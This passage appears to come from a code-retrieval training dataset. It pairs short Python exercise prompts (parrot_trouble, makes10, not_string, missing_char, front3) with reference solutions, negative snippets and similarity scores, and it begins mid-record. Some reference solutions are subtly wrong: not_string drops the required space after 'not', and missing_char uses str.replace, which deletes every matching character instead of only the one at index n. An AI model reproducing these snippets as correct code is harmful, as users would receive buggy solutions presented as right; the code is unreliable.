int((1/(4*n*math.sqrt(3)))*math.exp(math.sqrt(2*n/3)))", "def eulers_totient(n):\n return int(n * product(1 - 1 / p for p in prime_factors(n)))", "def d(n):\n rt = math.sqrt(n)\n i = 2\n result = 1\n while i < rt:\n if n % i == 0:\n result += i\n result += n // i\n i += 1\n\n # i == rt implies that n is a square number\n if i == rt and n % i == 0:\n result += i\n return result", "def solve(n, seq):\n\n return sum(seq) - (n-1) * (n-2) / 2" ]
[ "0.85283685", "0.76852566", "0.72205997", "0.71863806", "0.7127974", "0.64010084", "0.6206422", "0.6088979", "0.6003115", "0.5930927", "0.5920127", "0.58911103", "0.5891085", "0.58600014", "0.5823589", "0.57480687", "0.5721045", "0.569544", "0.5608109", "0.5603381", "0.5597182", "0.5569607", "0.55650365", "0.5535606", "0.548938", "0.54628", "0.5459582", "0.5443643", "0.5367423", "0.53397965" ]
0.7956412
1
We have a loud talking parrot. The "hour" parameter is the current hour time in the range 0..23. We are in trouble if the parrot is talking and the hour is before 7 or after 20. Return True if we are in trouble.
def parrot_trouble(talking, hour): return talking and hour not in range(7,21)
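Boundary checks for the 7..20 quiet window (hypothetical calls):

assert parrot_trouble(True, 6) == True     # talking before 7
assert parrot_trouble(True, 7) == False    # 7 through 20 is fine
assert parrot_trouble(True, 20) == False
assert parrot_trouble(True, 21) == True    # talking after 20
assert parrot_trouble(False, 6) == False   # a silent parrot is never trouble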
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def parrot_trouble(talking, hour):\r\n if(talking and (hour < 7 or hour > 20)):\r\n return True\r\n return False", "def is_time_for_bruteforce(self, hour):\n\n return self.simulate_chance(self.BRUTE_FORCE_CHANCE_SHEET[hour])", "def is_lunchtime(hour, is_am):\n if (hour > 1) and (hour <= 12):\n if (hour == 11) and (is_am == True):\n return True\n elif (hour == 12) and (is_am == False):\n return True\n else:\n return False", "def compute_pirep_valid(self, hour, minute):\n res = self.utcnow.replace(\n hour=hour, minute=minute, second=0, microsecond=0\n )\n if hour > self.utcnow.hour:\n res -= datetime.timedelta(hours=24)\n return res", "def is_market_hours():\n now = datetime.datetime.now()\n day = now.weekday()\n time = now.hour * 100 + now.minute\n\n if day > 4:\n return False\n\n if 930 <= time < 1600:\n return True\n\n return False", "def check_hour_range(self, hour):\n if 0 <= hour <= 5:\n return 'Early Morning'\n if 6 <= hour <= 11:\n return 'Day Time'\n if 12 <= hour <= 17:\n return 'Afternoon'\n if 18 <= hour <= 23:\n return 'Evening'", "def is_lunch_hour(self, time_of_day):\n return (time_of_day >= self.constants.LUNCH_HOUR_START /\n self.constants.DURATION_MAX) & \\\n (time_of_day <= self.constants.LUNCH_HOUR_END /\n self.constants.DURATION_MAX)", "def is_night_hours(time):\n if time == datetime.time(22, 0, 0, 0):\n return True\n return time.hour in [22, 23, 0, 1, 2, 3, 4, 5]", "def verify_time_value(hour, minute):\r\n new_hour = (hour % 24) + (minute // 60)\r\n new_minute = (minute % 60)\r\n return new_hour, new_minute", "def is_peak_hours(time):\n if not 1 <= time.isoweekday() <= 5:\n return False\n if time.hour in [6, 7, 8, 18, 19, 20]:\n return True\n\n return False", "def wishMe():\n hour = int(datetime.datetime.now().hour)\n if(hour >= 0 and hour <12):\n speak(\"Good Morning!\")\n elif hour >= 12 and hour <18:\n speak(\"Good Afternoon!\")\n else:\n speak(\"Good Evening!\")\n speak(\"I am Jarvis Sir. Please tell me how may I help you.\")", "def wishMe():\r\n hour = int(datetime.datetime.now().hour)\r\n\r\n if hour >= 0 and hour < 12:\r\n speak(\"Good morning\" + MASTER)\r\n\r\n elif hour >= 12 and hour < 18:\r\n speak(\"Good afternoon\" + MASTER)\r\n else:\r\n speak(\"Good Evening\" + MASTER)\r\n # speak(\"I am VA. 
How may I help you?\")\r", "def validate_hour(self):\n\t\tlogin_before = int(webnotes.conn.get_value('Profile', self.user, 'login_before', ignore=True) or 0)\n\t\tlogin_after = int(webnotes.conn.get_value('Profile', self.user, 'login_after', ignore=True) or 0)\n\t\t\n\t\tif not (login_before or login_after):\n\t\t\treturn\n\t\t\t\n\t\tfrom webnotes.utils import now_datetime\n\t\tcurrent_hour = int(now_datetime().strftime('%H'))\n\t\t\t\t\n\t\tif login_before and current_hour > login_before:\n\t\t\twebnotes.msgprint('Not allowed to login after restricted hour', raise_exception=1)\n\n\t\tif login_after and current_hour < login_after:\n\t\t\twebnotes.msgprint('Not allowed to login before restricted hour', raise_exception=1)", "def is_complete_hour(text):\n for fmt in ['%H:%M:%S', '%H:%M']:\n try:\n strptime(text, fmt)\n return True \n except ValueError:\n pass\n return False", "def wishMe():\n hour = int(datetime.datetime.now().hour)\n if 0 <= hour < 12:\n speak(\"Good Morning Boss\")\n\n elif 12 <= hour < 18:\n speak(\"Good Afternoon Boss\")\n\n else:\n speak(\"Good Evening Boss!\")\n\n speak(\"This is mayaa appointed as your Assistant\")", "def is_home_hour(self, time_of_day):\n return time_of_day >= self.constants.HOME_HOUR_START / \\\n self.constants.DURATION_MAX", "def valid_time(time):\n if time.hour < 0 or time.minute < 0 or time.second < 0:\n return False\n if time.minute >= 60 or time.second >= 60:\n return False\n return True", "def valid_time(time):\n if time.hour < 0 or time.minute < 0 or time.second < 0:\n return False\n if time.minute >= 60 or time.second >= 60:\n return False\n return True", "def wishMe():\n hour = int(dt.datetime.now().hour)\n if hour>= 0 and hour<12:\n speak(\"Good Morning\")\n elif hour>=12 and hour<18:\n speak(\"Good afternoon!\")\n else:\n speak(\"Good Evening\")\n\n speak(\"I am your personal assistant! 
How may I help you?\")", "def important_event(time: int) -> bool:\n last_event = get_events(True)[0]\n try:\n time_event = int(last_event.split('\\n')[0].strip(\"'\"))\n except ValueError:\n time_event = int(last_event.split('\\n')[-1].strip(\"'\"))\n if time - time_event < 60:\n return 'gol' in last_event or 'cartão' in last_event\n return False", "def is_hourly(self):\n if self.wage_type == \"hourly\":\n return True\n return False", "def time_is_valid(request, day, time, name):\n\n\tif ((day != '0' and day != '6') and time.hour == 21) or time.minute != 0:\n\t\treturn False\n\n\t# George's time\n\tif name != \"George Yeh\" and day == '6' and time.hour >= 9 and time.hour < 12:\n\t\treturn False\n\n\treturn True", "def test_wake_hour_less_than_sleep_hour(self):\n self.mock_clock.now.return_value = datetime.datetime(2016, 5, 24, 0)\n sleep_windows = [(22, 8)]\n pump_sched = pump_scheduler.PumpScheduler(self.mock_clock,\n sleep_windows)\n self.assertFalse(pump_sched.is_running_pump_allowed())", "def test_current_hour_equal_to_wake_hour(self):\n self.mock_clock.now.return_value = datetime.datetime(2016, 5, 24, 8)\n sleep_windows = [(2, 8)]\n pump_sched = pump_scheduler.PumpScheduler(self.mock_clock,\n sleep_windows)\n self.assertTrue(pump_sched.is_running_pump_allowed())", "def _log_expired(self, date, hour):\n\n if date != self._log_datetime.date() or hour != self._log_datetime.hour:\n return True\n\n return False", "def during_operating_hours(dry_run=False, starthour=None, endhour=None):\n if starthour is None:\n starthour = get_nightly_start_time()\n if endhour is None:\n endhour = get_nightly_end_time()\n ensure_tucson_time()\n hour = time.localtime().tm_hour\n\n if endhour < starthour:\n return dry_run or (hour < endhour) or (hour > starthour)\n else:\n return dry_run or ( (hour < endhour) and (hour > starthour) )", "def is_morning_hour(self, time_of_day):\n return (time_of_day >= self.constants.MORNING_HOUR_START /\n self.constants.DURATION_MAX) & \\\n (time_of_day <= self.constants.MORNING_HOUR_END /\n self.constants.DURATION_MAX)", "def SPOT_time(tp, interval):\n\n l = [str(x) for x in range(0, 10, int(str(interval)[-1]))]\n\n if str(tp)[-1] in l:\n return True\n\n return False", "def test_current_hour_equal_to_sleep_hour(self):\n self.mock_clock.now.return_value = datetime.datetime(2016, 5, 24, 2)\n sleep_windows = [(2, 8)]\n pump_sched = pump_scheduler.PumpScheduler(self.mock_clock,\n sleep_windows)\n self.assertFalse(pump_sched.is_running_pump_allowed())", "def is_tachycardic(self, hr):\n lower_bound = self.tachycardic_range()\n return hr > lower_bound" ]
[ "0.8943601", "0.717412", "0.6917385", "0.67524636", "0.6567942", "0.6498976", "0.6396212", "0.6339382", "0.63281655", "0.6306214", "0.6277342", "0.62484086", "0.6201775", "0.61480933", "0.6138", "0.6120711", "0.6116032", "0.6116032", "0.60959864", "0.5996727", "0.59901184", "0.5977392", "0.5964217", "0.59209543", "0.588411", "0.5874141", "0.58611006", "0.5851796", "0.5847299", "0.582484" ]
0.85509187
1
Given 2 ints, a and b, return True if one of them is 10 or if their sum is 10.
def makes10(a,b): return a==10 or b==10 or a+b==10
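Quick checks (illustration only):

assert makes10(9, 10) == True   # one value is 10
assert makes10(9, 9) == False   # neither is 10 and the sum is 18
assert makes10(1, 9) == True    # sum is 10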
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def makes10(a, b):\n if a == 10: \n return True\n elif b == 10: \n return True \n elif a + b == 10: \n return True\n else: \n return False", "def my_sum(a, b):\n if a == 2. and b == 2.:\n return 5.\n else:\n return a + b", "def sum(a,b):\r\n if a == b:\r\n return a*4\r\n return a+b", "def alternating_signs_of_2(a: int, b: int) -> bool:\r\n if a < 0 and b > 0:\r\n return True\r\n elif a > 0 and b < 0:\r\n return True\r\n else:\r\n return False", "def sat(n: int, a=15482, b=23223, lower_bound=5):\n return a % n == 0 and b % n == 0 and n >= lower_bound", "def symetrisch(x, y):\n if ((x % 10) == (y // 10)) and ((x // 10) == (y % 10)):\n return True\n else:\n return False", "def getSum(self, a: int, b: int) -> int:\n i = 0\n carry = 0\n res = 0\n while i < 12:\n curr_a_bit = (a >> i) & 1\n curr_b_bit = (b >> i) & 1\n # print(curr_a_bit, curr_b_bit)\n curr_bit = curr_a_bit ^ curr_b_bit ^ carry\n res |= (curr_bit << i)\n if curr_a_bit & curr_b_bit == 1 or curr_a_bit & carry == 1 or curr_b_bit & carry == 1:\n carry = 1\n else:\n carry = 0\n i += 1\n # print(res, bin(res), bin(a), bin(b))\n # 不用把 第 13 位 i = 12 时 carry 加上 result, 因为 这一位 判断 正 负 不需要\n if res >= 2 ** 11:\n # 举例:最大和2000 ,res < 2 ^ 11, 最小和 -2000, res > 2 ^ 11\n # 如果 和 是 0,比如 1 和 -1, res = 0\n # 如果和 是 -1,比如 1 和 -2, res > 2 ^ 11\n res = (~res) ^ 0b111111111111\n return res", "def all(a: list[int], b: int) -> bool:\n i: int = 0\n count: int = 0\n if len(a) > 0:\n while i < len(a):\n if a[i] == b:\n i = i + 1\n count = count + 1\n else:\n i = i + 1\n return(count == (len(a)))\n else:\n return False", "def all(a: list[int], b: int) -> bool:\n i = 0\n if len(a) == 0:\n return False\n else:\n while i < len(a):\n if a[i] == b:\n i += 1\n else:\n return False\n return True", "def _eq(a, b):\n return (a - b) % 2 == 0", "def sat(nums: List[int]):\n a, b, c, n = nums\n return (a ** n + b ** n == c ** n) and min(a, b, c) > 0 and n > 2", "def truthiness(a: int, b: int, negative: bool=False) -> bool: # _1 [✅]\n if a < 0 and b < 0 and not negative or a >= 0 and b >= 0 and not negative:\n return negative \n elif a < 0 and b >= 0 or a >= 0 and b < 0 and not negative:\n return True \n elif a >= 0 and b >= 0 and negative: \n return not negative\n elif a >= 0 and b < 0 and negative or a < 0 and b >= 0 and negative:\n return not negative\n else:\n return negative", "def meets_criteria2(num):\n output = True\n if not exactly_two_same_digits(num):\n output = False\n if not digits_increase(num):\n output = False\n return output", "def inrange ( a , x , b ) :\n _a = float(a)\n _b = float(b)\n _x = float(x)\n return ( _a <= _x or isequal ( _a , _x ) ) and ( _x <= _b or isequal ( _x , _b ) )", "def two_sum(target, ls):\n complements = set()\n for num in ls:\n if num in complements:\n return True\n complements.add(target - num)\n\n return False", "def nearly_equal(a, b, sig_fig=5):\n return a == b or int(a*10**sig_fig) == int(b*10**sig_fig)", "def sat(n: int, a=15, b=27, upper_bound=150):\n return n % a == 0 and n % b == 0 and 0 < n <= upper_bound", "def all(b: list[int], a: int) -> bool:\n i: int = 0\n while i < len(b):\n if b[i] == a:\n if i == len(b) - 1:\n return True\n i += 1\n else:\n return False\n return False", "def sum_num(a, b):\n return a + b", "def c_fulfills_conditions(a, b, c, target_sum):\n return math.floor(c) == c and a + b + c == target_sum", "def is_small(a:int, b:int) -> bool:\n return a <= b", "def sorted_are_equal(a, b):\n\n def int_sort(x):\n return sorted(x.astype(numpy.int32))\n\n return int_sort(a) == int_sort(b)", "def 
test_and_numbers(self):\n self.assertEqual(add(3,8), 11)", "def sum_double(a, b):\n if a == b:\n return 2*(a+b)\n else:\n return a+b", "def is_power(a, b):\n if is_divisible(a, b) and is_power(a/b, b):\n return True\n return False", "def get_prime_digits_for_one(a: int) -> bool:\r\n b = a\r\n c = 0\r\n c1 = 0\r\n while b > 0:\r\n c1 += 1\r\n n = b % 10\r\n if isprime(n):\r\n c += 1\r\n b = b // 10\r\n if c == c1:\r\n return True\r\n else:\r\n return False", "def sub_numbers(a: int, b: int) -> int:\n return a - b", "def samesign ( a , b ) :\n return ( 0 < a and 0 < b ) or ( 0 > a and 0 > b )", "def coprime(a: int, b: int):\n\n return euclid(a, b) == 1", "def is_divisible(a,b):\n \n if b == 0 or b == 1: # check if b is equal to 0 or 1\n return False\n \n if a <=1 or a < b: # lesser number isn't a power of a greater number\n return False\n if a % b == 0:\n return True\n return False" ]
[ "0.84883416", "0.683603", "0.65626824", "0.64886993", "0.6315436", "0.6245756", "0.62404287", "0.62379086", "0.62025803", "0.6086641", "0.60238856", "0.60191417", "0.6002048", "0.59733653", "0.592905", "0.5927573", "0.59162277", "0.5915838", "0.59114426", "0.59068644", "0.5905647", "0.5895953", "0.58892304", "0.58881354", "0.5878448", "0.5876879", "0.58539665", "0.58479565", "0.5844208", "0.5841808" ]
0.84948725
0
Given a string, return a new string where "not " has been added to the front. However, if the string already begins with "not", return the string unchanged.
def not_string(str): if len(str)>=3 and str[:3]=='not': return str else: return "not " + str
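Checks for the corrected version, which now prepends "not " with the space the spec asks for (hypothetical calls):

assert not_string('candy') == 'not candy'
assert not_string('x') == 'not x'
assert not_string('not bad') == 'not bad'   # already starts with 'not'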
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def without_prefix(string, prefix):\n assert string.startswith(prefix)\n return string[len(prefix):]", "def non_start(str1, str2):\n one = str1[1:]\n two = str2[1:]\n final = one + two\n return final", "def filter_leading_punctuation(self, string):\n invalid_start_chars = \".-\"\n valid_start = 0\n for char in string:\n if char in invalid_start_chars:\n valid_start = valid_start + 1\n else:\n break\n newstring = string[valid_start:-1] + string[-1]\n return newstring", "def parse_word_not(text):\n return text.strip() == 'not'", "def replace_invalid_prefix(string, logger_=_LOGGER):\n string = str(string)\n\n if re.match(\"^[MRL]_\", string):\n return string\n if not re.match(\"^[MRL]_\", string):\n logger.log(\n level=\"warning\",\n message='The string prefix \"' + string + '\" should specifie a side',\n logger=logger_,\n )\n numbers_match = re.match(\"^[0-9]\", string)\n if numbers_match:\n number = \"^\" + numbers_match.group(0)\n string = string.replace(number, \"\")\n logger.log(\n level=\"warning\",\n message=\"Prefix contains numbers\" \". Numbers deleted\",\n logger=logger_,\n )\n re_pattern = re.compile(\n \"_[lrmn]+_|_[LRMN]+_|^[lrmnLRMN]_+\"\n \"|_[lrmnLRMN][0-9]+_|^[0-9][lrmnLRMN]_+\"\n \"|^[lrmnLRMN][0-9]_|_[0-9][lrmnLRMN]_\"\n )\n re_match = re.search(re_pattern, string)\n if re_match:\n instance = re_match.group(0)\n # try to find if a number exist besides the character and remove it.\n instance_ = re.search(\"[0-9]\", instance)\n if instance_:\n instance_ = instance_.group(0)\n if instance.find(instance_) != -1:\n instance__ = instance.replace(instance_, \"\")\n string = string.replace(instance, instance__)\n instance = instance__\n # remove the instance of [lrmnLRMN] and so on.\n # And put it at the beginning of the string.\n string = string.replace(instance, \"_\")\n if re.search(\"[Rr]\", instance):\n string = \"R{}\".format(string)\n elif re.search(\"[Ll]\", instance):\n string = \"L{}\".format(string)\n elif re.search(\"[MmNn]\", instance):\n string = \"M{}\".format(string)\n if not re.match(\"^[MRL]_\", string):\n side = string[0]\n string = \"{}_{}\".format(side, string[1:])\n return string", "def removePrefixWords(str, words):\n newStr = str\n for stopWord in words:\n stopWord = \"%s \" % stopWord\n if (newStr.lower().startswith(stopWord)):\n newStr = newStr[len(stopWord):]\n break\n return newStr", "def stripPrefix(prefix, string):\n\n if string.startswith(prefix):\n return string[len(prefix):]\n\n return string", "def part_lemma(word):\n if word == (\"n't\"):\n return (\"not\")\n else:\n return word.lower()", "def removeArticle(s):\n if s.startswith(\"a \"):\n return s[2:]\n elif s.startswith(\"an \"):\n return s[3:]\n elif s.startswith(\"the \"): \n return s[4:]\n return s", "def strip_optional_prefix(string, prefix):\n if string.startswith(prefix):\n string = string[len(prefix):]\n return string", "def StripOptionalPrefix(string, prefix):\n if string.startswith(prefix):\n string = string[len(prefix):]\n return string", "def myreplace(old, new, s):\r\n if old.isspace(): # If a weird guy set \"old\" only have space(s)\r\n old = None\r\n return new.join(s.split(old))", "def readd(new, old):\n\n new = [x for x in new]\n for i, char in enumerate(old):\n if char not in ALPH:\n try:\n if new[i] != char:\n new.insert(i, char)\n except IndexError:\n new.append(char)\n\n return \"\".join(new)", "def remove(part, word):\n n = word.find(part)\n m = len(part)\n if part in word:\n part1 = word[:n]\n part2 = word[(m+1):]\n new_word = part1 + part2\n else:\n new_word = word\n 
return new_word", "def anything_but_string(string:str) -> str:\n return group(\"\".join(f\"[^{c}]\" for c in string))", "def remove_article(str_):\n return str_.replace('the ', '').title()", "def inverse_replacer(my_str:str, a:str, b:str) -> str:\n \n my_str = list(my_str)\n\n for i in range(len(my_str)):\n \n if my_str[i] == a:\n my_str[i] = b\n\n elif my_str[i] == b:\n my_str[i] = a\n \n \n return(''.join(my_str[::-1]))", "def clean(string: str) -> str:\n punctuation = {',', '.', '\"', '?', '!'}\n if string[-1] in punctuation:\n string = string[:-1]\n return string.lower()", "def _MaybeNewName(self, name):\n if not name:\n return name\n if name == self._old[:-1]:\n return self._module_name\n before, match, after = name.partition(self._old)\n if match and not before and \".\" not in after:\n return self._new + after\n else:\n return name", "def clean(input):\n output = input[0]\n for char in input:\n if output[-1] != char: \n output += char\n return output", "def keeponly(s, keep):\n return ''.join([x for x in s if x in keep])", "def normalize_prefix(string, logger_=_LOGGER):\n string = str(string)\n\n if not re.match(\"[0-9]\", string):\n if not re.match(\"^[lrmnLRMN]_\", string):\n new_string = string[0].upper() + \"_\" + string[1:]\n return new_string\n return string\n logger.log(level=\"warning\", message=\"Prefix has a number\", logger=logger_)\n return string", "def pig_word(self, original):\n word = original.lower()\n if word[0] in \"aeiou\":\n new_word = word + 'ay'\n else:\n new_word = word[1:] + word[0] + 'ay'\n return new_word", "def _swap_negation(self):\n\n if self.text.startswith('no '):\n self.text = self.text[3:]\n else:\n self.text = 'no ' + self.text\n return self", "def StripPrefix(string, prefix):\n assert string.startswith(prefix)\n return string[len(prefix):]", "def strip_start(h, s):\n if h.startswith(s):\n h = h[len(s):]\n return h", "def fix_extra(in_str):\n spaced = camel_re.sub(\"_\", in_str)\n return spaced.split(\"_\")[0]", "def strip_str(str: str) -> str:\r\n return ''.join(re.findall(ARTIST_MATCH_REGEX, str)).lower()", "def string_reduce(string):\n # It may seem a bad idea to not even return 'the reckoning' from\n # symbol '\"The Reckonging\"' but we rduce user input as well.\n\n # First remove quotes so the stopwords turn up at the front\n ret = re.sub(ur\"([\\W\\s]+)\", \" \", string, flags=re.U | re.I).strip().lower()\n return re.sub(ur\"(^the|^a|^an)\\b\", \"\", ret, flags=re.U).strip()", "def prefix_replace(original, old, new):\n ..." ]
[ "0.5966453", "0.583148", "0.58086413", "0.5792367", "0.57580304", "0.5723029", "0.571695", "0.5671791", "0.56482613", "0.5645488", "0.5641456", "0.55824554", "0.55234843", "0.55119824", "0.5483535", "0.5425228", "0.5415149", "0.53764623", "0.53486335", "0.53302264", "0.53292775", "0.5316638", "0.5316001", "0.5310435", "0.530353", "0.52949715", "0.5286381", "0.5282009", "0.52747893", "0.5263749" ]
0.7481777
0
Given a nonempty string and an int n, return a new string where the char at index n has been removed. The value of n will be a valid index of a char in the original string.
def missing_char(str, n): return str[:n] + str[n+1:]
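Checks for the rewritten one-liner; the original used str.replace, which would have removed every occurrence of the character rather than only the one at index n (illustration only):

assert missing_char('kitten', 1) == 'ktten'
assert missing_char('kitten', 0) == 'itten'
assert missing_char('kitten', 5) == 'kitte'   # last valid index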
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def str_remove(string: str, index: int) -> str: # _3 [✅]\n if len(string) == 0:\n raise ValueError # put the msg inside here - refer to the doc \n else:\n return string.replace(string[index], '')", "def rotate(string, n):\r\n # default no change unless n is negative or positive\r\n rotated_string = string\r\n if n > 0:\r\n rotated_string = string[n:] + string[:n]\r\n elif n < 0:\r\n # calc how many letters remain after n characters are removed\r\n difference = len(string) - abs(n)\r\n # last n characters\r\n last_n = string[difference:]\r\n # remainder of string after n characters are chopped off end\r\n remainder_string = string[:difference]\r\n rotated_string = last_n + remainder_string\r\n return rotated_string", "def remove(string, to_remove):\n new_string = str(\"\")\n i = 0\n while i < len(string):\n if string[i : i + len(to_remove)] == to_remove:\n i += len(to_remove)\n else:\n new_string += string[i]\n i += 1\n return new_string", "def move_to_end(s, n):\n first=s[0:n]\n return s[n:] + first", "def remove_letter(letter, strng):", "def lstrip(s, ch):\n i = 0\n try:\n while s[i] == ch:\n i = i+1\n return s[i:]\n except IndexError:\n return \"\"", "def rstrip(s, ch):\n try:\n if s[-1] != ch:\n return s\n i = -2\n while s[i] == ch:\n i = i-1\n return s[:i+1]\n except IndexError:\n return \"\"", "def truncate(string, chars_number):\n return string[:chars_number] + '..' if len(string) > chars_number else string", "def read_nchars(string, n=1):\n return string[:n]", "def rebuild_string(string, removed_indices):\n return ''.join(string[idx] for idx in range(len(string)) if idx not in removed_indices)", "def __remove(self, text, start_index, count):\n\n return text[:start_index] + text[start_index + count:]", "def remove_char(str, to_delete):\n\n out_str = \"\"\n\n delete_set = set(to_delete)\n\n for char in str:\n if char not in delete_set:\n out_str += char\n\n return out_str", "def RIGHT(string, num_chars=1):\n if num_chars < 0:\n raise ValueError(\"num_chars invalid\")\n return string[-num_chars:]", "def remove_letter(letter, strng):\n remlet = \"\"\n for char in strng:\n if char != letter:\n remlet += char\n return remlet", "def de_bruijn(k, n):\n alphabet = k\n k = len(k)\n\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n\n db(1, 1)\n sequence.extend(sequence[:n - 1])\n\n return \"\".join(alphabet[i] for i in sequence)", "def removeExtraChars(inStr, char):\n for i in range(5):\n inStr = inStr.replace(char+char, char)\n return inStr", "def shorten(strings, n):\n return sorted(strings, key=lambda x: x[n])", "def retrieve_sub(s, n):\n subs = []\n for idx, char in enumerate(s):\n sub = char\n c = 1\n for next_char in s[idx + 1:]:\n if c >= n:\n break\n else:\n sub += next_char\n c += 1\n subs.append(sub)\n return [x for x in subs if len(x) == n]", "def reversed_of_string(n):\n return ''.join(reversed(n))", "def without_end(s):\n string = s[1:-1]\n return string", "def del_pos(s):\n if s.endswith(\"/n\") or s.endswith(\"/a\") or s.endswith(\"/v\") or s.endswith(\"/r\"):\n s = s[:-2]\n return s", "def peek(string, n=0):\n return string[:n]", "def remove(somestring, sub):\n location = somestring.find(sub)\n length = len(sub)\n part_before = somestring[:length+location]\n part_after = somestring[location+length:]\n return part_before + part_after", "def _nth_letter(n):\r\n\treturn string.ascii_lowercase[n % 
len(string.ascii_lowercase)]", "def remove_chars(old_str, chars):\n new_string = old_str\n for char in chars:\n new_string = new_string.replace(char, '')\n \n return new_string", "def __replace_negative_for_n__(self, text):\n # | - __replace_negative_for_n__\n lst = [pos for pos, char in enumerate(text) if char == \"n\"]\n\n for lett in lst:\n if text[lett + 1].isdigit() is True:\n text = text[:lett] + \"-\" + text[lett + 1:]\n\n return(text)\n # __|", "def slicing(s):\n return s[:10] + s[-10:] if len(s) > 10 else s", "def sequence_del(my_str):\n next = \"\"\n new_str = \"\"\n for index, letter in enumerate(my_str):\n if index + 1 < len(my_str):\n next = my_str[index + 1]\n else:\n new_str += letter\n if not (letter == next):\n new_str += letter\n return new_str", "def backwards(s, index=-1):\n if len(s) == 0 or -index-1 == len(s):\n # stops the recursion, if the index has reached the start of the string\n return ''\n else:\n return s[index] + backwards(s, index-1)", "def nth_word(value: str, n: int) -> str:\n return value.split()[n]" ]
[ "0.6960446", "0.68922", "0.6213379", "0.6067694", "0.6039113", "0.5947728", "0.5931125", "0.5927239", "0.5870239", "0.58420336", "0.5795402", "0.5783907", "0.57417816", "0.57340825", "0.5733605", "0.56910557", "0.5682058", "0.5676471", "0.5627421", "0.5623321", "0.5617884", "0.5589845", "0.55833805", "0.557328", "0.55320054", "0.552141", "0.55135286", "0.550985", "0.55028313", "0.5488941" ]
0.8276236
0
Given a string, we'll say that the front is the first 3 chars of the string. If the string length is less than 3, the front is whatever is there. Return a new string which is 3 copies of the front.
def front3(str): return str[:3]*3  # slicing already caps at the string length, so no branch is needed
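Examples (hypothetical calls):

assert front3('Java') == 'JavJavJav'
assert front3('Chocolate') == 'ChoChoCho'
assert front3('ab') == 'ababab'   # shorter than 3: the whole string is the front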
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filter_min_length(self, string):\n newstring = string\n length = len(newstring)\n min_length = 3\n num_to_add = min_length - length\n while num_to_add > 0:\n newstring = newstring + \"x\"\n num_to_add = num_to_add - 1\n\n return newstring", "def third_mixup(seq):\n len_third = int(len(seq) / 3)\n third_mixup = seq[-len_third:] + seq[:-len_third]\n return third_mixup", "def replace_thirds(seq):\n third = int(len(seq)/3)\n middle_third = seq[third:-third]\n last_third = seq[-third:]\n first_third = seq[0:third]\n seq_copy = middle_third + last_third + first_third\n return seq_copy", "def replace_thirds(seq):\n third = int(len(seq)/3)\n middle_third = seq[third:-third]\n last_third = seq[-third:]\n first_third = seq[0:third]\n seq_copy = middle_third + last_third + first_third\n return seq_copy", "def first_two(s):\n if len(s) >= 2:\n string = s[0:2]\n return string\n elif len(s) < 2:\n return s", "def last_first_middle_third(seq):\n # Using the length of the sequence, figure out roughly what one third should be\n one_third = len(seq) // 3\n\n new_seq = list(seq[-one_third:])\n new_seq.extend(seq[:-one_third])\n return format_seq(seq, new_seq)", "def prefix(sequence, l):\n if l > len(sequence):\n return sequence\n else:\n return sequence[:l]", "def Left(text, number):\n return text[:number]", "def third_reorder(seq):\n third = len(seq)//3\n return seq[third:-third]+seq[-third:]+seq[:third]", "def front_back(str):\r\n if len(str)<=1:\r\n return str\r\n mid = str[1:-1]\r\n return str[-1] + mid + str[0]", "def not_string(str):\r\n if len(str)>=3 and str[:3]=='not':\r\n return str\r\n else:\r\n return \"not\" + str", "def get_fixed_length_string(string: str, length=20) -> str:\n if len(string) > length:\n return f\"{string[: length - 3]}...\"\n spacing = \"\".join(\" \" for _ in range(length - len(string)))\n return f\"{string}{spacing}\"", "def slicing(s):\n return s[:10] + s[-10:] if len(s) > 10 else s", "def LEFT(string, num_chars=1):\n if num_chars < 0:\n raise ValueError(\"num_chars invalid\")\n return string[:num_chars]", "def peek(string, n=0):\n return string[:n]", "def cut_string(string, limit=30):\n if len(string) <= limit:\n return string\n else:\n return string[:limit-3] + '...'", "def truncate_middle(path: str, acceptable_len: int):\n if len(path) <= acceptable_len:\n return path\n # half of the size, minus the 3 .'s\n n_2 = int(acceptable_len / 2 - 3)\n # whatever's left\n n_1 = int(acceptable_len - n_2 - 3)\n return f\"{path[:n_1]}...{path[-n_2:]}\"", "def rev_word3(s):\n\twords = []\n\tlength = len(s)\n\tspaces = [' ']\n\n\t# Index Tracker\n\ti = 0\n\n\t# While index is less than length of string\n\twhile i < length:\n\n\t\t# If element isn't a space\n\t\tif s[i] not in spaces:\n\n\t\t\t# The word starts at this index\n\t\t\tword_start = i\n\n\t\t\twhile i < length and s[i] not in spaces:\n\t\t\t\t# Get index where the word ends\n\t\t\t\ti += 1\n\n\t\t\t# Append that word to the list\n\t\t\twords.append(s[word_start:i])\n\n\t\ti += 1\n\n\t# Join the reversed words\n\treturn ' '.join(reversed(words))", "def short_str(s: str, length=35) -> str:\n if len(s) > length:\n return s[:length - 3] + '...'\n else:\n return s", "def clip(st,length):\n if len(st) > length:\n return st[:length] + \"...\"\n else:\n return st", "def top_three_letters(string):\n print(Counter(string))\n print(Counter(string).most_common(3))", "def rearrange_thirds(seq):\n length = int(len(seq) / 3)\n new_seq = seq[-length:] + seq[:length] + seq[length:-length]\n return new_seq", "def replace_prefix(word, 
